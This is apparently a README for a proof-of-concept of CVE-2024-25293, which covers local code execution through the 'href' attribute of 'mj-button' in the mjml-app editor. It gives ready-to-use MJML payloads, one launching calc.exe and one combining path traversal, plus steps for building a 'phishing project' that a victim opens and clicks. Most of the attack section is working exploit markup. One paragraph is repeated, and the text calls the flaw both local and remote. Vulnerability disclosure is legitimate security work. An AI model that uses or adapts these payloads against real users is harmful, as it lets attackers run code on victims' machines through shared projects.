A Proof-Of-Concept for CVE-2024-25293 vulnerability.
mjml-app v3.0.4 & 3.1.0-beta was discovered to contain a remote code execution (RCE)
In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it.
- Vulnerability Subject: Local Code Execution
- Vulnerability Version: mjml-app 3.0.4-win & mjml-app 3.1.0-beta
- Attack Type: Remote Code Execution
- Attack Component: In the 'mj-button' tag within the affected source code file, the 'href' attribute enables local code execution.
- Reserved CVE Number: CVE-2024-25293
- mjml-app 3.0.4-win & mjml-app 3.1.0 beta suffers from Security Misconfiguration In the 'mj-button' tag, which can result in arbitrary code execution.
- Exploit explain
- Running local files through event tags in mjml applications poses a security threat. In addition, the code can be executed by combining Path Traversal within the application, requiring a patch.
- Running local files through event tags in mjml applications poses a security threat. In addition, the code can be executed by combining Path Traversal within the application, requiring a patch.
Step 1) The attacker creates an 'mj-button' with an 'href' tag and
- case 1) Code Execution with Path Traversal (notepad.exe)
- case 2) Code Execution (calc.exe)
<mjml>
<mj-body>
<mj-section>
<mj-column>
<mj-button background-color="#f45e43" color="white" href="C:\Users\EQST\Desktop\jruru\..\jruru_hacked.txt"> jruru </mj-button>
<mj-button background-color="#f45e43" color="white" href="C:Windows/System32/calc.exe"> Code Execution </mj-button>
</mj-column>
</mj-section>
</mj-body>
</mjml>
Step 2) The attacker creates the main phishing project with the following code.
<!-- header.mjml -->
<mj-section>
<mj-column>
<mj-text>This is a demo jruru</mj-text>
</mj-column>
</mj-section>
<!-- main.mjml -->
<mj-include path="./index.mjml" />
Step 3) The victim opens the shared project and clicks the button, triggering the execution of payload(etc. calc , notepad)
Running exe files through href tags within an application is risky, and running files in combination with Path Traversal is a security concern. This allows phishing projects to be created and deployed to execute local files. Therefore, it is essential to modify this feature to prevent such execution.